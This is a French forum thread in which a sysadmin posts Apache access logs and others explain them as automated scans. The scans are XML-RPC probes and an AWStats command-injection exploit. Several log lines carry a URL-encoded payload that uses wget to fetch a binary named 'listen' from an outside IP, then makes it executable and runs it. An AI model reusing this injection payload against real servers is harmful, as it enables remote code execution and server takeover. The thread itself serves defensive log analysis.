Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1478 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  Requêtes bizarres sur un serveur apache d'entreprise...logs inside.

 
 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Requêtes bizarres sur un serveur apache d'entreprise...logs inside.

n°750775
elpoulpo
nickel
Posté le 10-11-2005 à 13:26:37  profilanswer
 

:hello:  
 
Hello
 
En jetant un petit coup d'oeil a mes logs apache j'ai trouvé des requêtes étranges qui se répètent régulièrement....
ça peut correspondre à quoi? :heink:  Sachant que je n'ai pas d'alias ou répertoire typ blog/drupal/ phpgroupware .(j'ai bien un awstats par contre...)
 
Merci
 
Serveur apache2 sur une Fedora core 2
 

Code :
  1. 84.147.51.156 - - [10/Nov/2005:04:23:37 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  2. 84.147.51.156 - - [10/Nov/2005:04:23:39 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  3. 84.147.51.156 - - [10/Nov/2005:04:23:40 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 302 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  4. 84.147.51.156 - - [10/Nov/2005:04:23:41 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  5. 84.147.51.156 - - [10/Nov/2005:04:23:42 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  6. 84.147.51.156 - - [10/Nov/2005:04:23:44 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  7. 84.147.51.156 - - [10/Nov/2005:04:23:45 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 302 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  8. 84.147.51.156 - - [10/Nov/2005:04:23:46 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  9. 84.147.51.156 - - [10/Nov/2005:04:23:47 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  10. 84.147.51.156 - - [10/Nov/2005:04:23:49 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  11. 84.147.51.156 - - [10/Nov/2005:05:28:12 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  12. 84.147.51.156 - - [10/Nov/2005:05:28:13 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  13. 84.147.51.156 - - [10/Nov/2005:05:28:14 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  14. 84.147.51.156 - - [10/Nov/2005:05:28:16 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  15. 84.147.51.156 - - [10/Nov/2005:05:28:17 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  16. 84.147.51.156 - - [10/Nov/2005:05:28:18 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 302 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  17. 84.147.51.156 - - [10/Nov/2005:05:28:20 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  18. 84.147.51.156 - - [10/Nov/2005:05:28:21 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  19. 84.147.51.156 - - [10/Nov/2005:05:28:23 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  20. 84.147.51.156 - - [10/Nov/2005:05:28:24 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 302 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  21. 84.147.51.156 - - [10/Nov/2005:05:28:26 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  22. 84.147.51.156 - - [10/Nov/2005:05:28:27 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  23. 84.147.51.156 - - [10/Nov/2005:05:28:28 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  24. 84.147.51.156 - - [10/Nov/2005:05:50:04 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  25. 84.147.51.156 - - [10/Nov/2005:05:50:05 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  26. 84.147.51.156 - - [10/Nov/2005:05:50:06 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 302 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  27. 84.147.51.156 - - [10/Nov/2005:05:50:08 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  28. 84.147.51.156 - - [10/Nov/2005:05:50:09 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  29. 84.147.51.156 - - [10/Nov/2005:05:50:10 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 302 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  30. 84.147.51.156 - - [10/Nov/2005:05:50:12 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  31. 84.147.51.156 - - [10/Nov/2005:05:50:13 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  32. 84.147.51.156 - - [10/Nov/2005:05:50:14 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 302 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  33. 84.147.51.156 - - [10/Nov/2005:05:50:16 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 302 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  34. 84.147.51.156 - - [10/Nov/2005:05:50:17 +0100] "POST /xmlrpc.php HTTP/1.1" 302 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  35. 84.147.51.156 - - [10/Nov/2005:05:50:18 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
  36. 84.147.51.156 - - [10/Nov/2005:05:50:20 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 302 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

mood
Publicité
Posté le 10-11-2005 à 13:26:37  profilanswer
 

n°750777
l0ky
Posté le 10-11-2005 à 13:29:39  profilanswer
 

des bots qui essayent de trouver des sites avec certains "package" contenant des failles...
Tu t'en fous, tant que tu n'as pas installé ces forums/blogs/ ou autres...

n°750778
ory
Posté le 10-11-2005 à 13:30:18  profilanswer
 

là en l'occurence il s'agit de wordpress et d'une faille d'awstats

n°750789
elpoulpo
nickel
Posté le 10-11-2005 à 13:50:11  profilanswer
 

Merci
 
Je viens de comprendre un peu en cherchant,et donc de sortir de mon monde de bisounours, je savais même pas qu'il y avait des attaques en chaîne sur les serveur web (de petites boîtes....)
 
En remontant les logs j'en trouve plein d'autres (exploitation de faille IIS :ange: ).
 
Généralement ce sont des machines infectées  ou des types qui s'amusent? (les 2 sans doute?)
 
 
 
J'ai ça dans aw-stats:
 allow from 127.0.0.1
plus un petit update  
ça doit suffire? nan?
 
(le code http 302 c'est found mais le 516 à côté c'est quoi??)

n°750791
l0ky
Posté le 10-11-2005 à 13:52:58  profilanswer
 

Je crois que c'est la taille de la requete (de mémoire). Les formats des logs sont définis quelques part, me rappelle plus où par contre.


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs
  réseaux et sécurité

  Requêtes bizarres sur un serveur apache d'entreprise...logs inside.

 

Sujets relatifs
Serveur apache sur le port 80 derrière une freebox[fedora core 4] Serveur internet
Reverse Proxy Apache[Apache] Impossible de faire marcher les répertoires utilisateurs
Apache & Vritualhostpb apache
[Topic FreeBSD] nouvelle version 10.0 dispo !!création serveur de mail sous debian
Configuration Apache et virtual hosting HELP 
Plus de sujets relatifs à : Requêtes bizarres sur un serveur apache d'entreprise...logs inside.

Forum MesDiscussions.Net, Version 2010.2
(c) 2000-2011 Doctissimo
Page générée en 0.115 secondes

Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR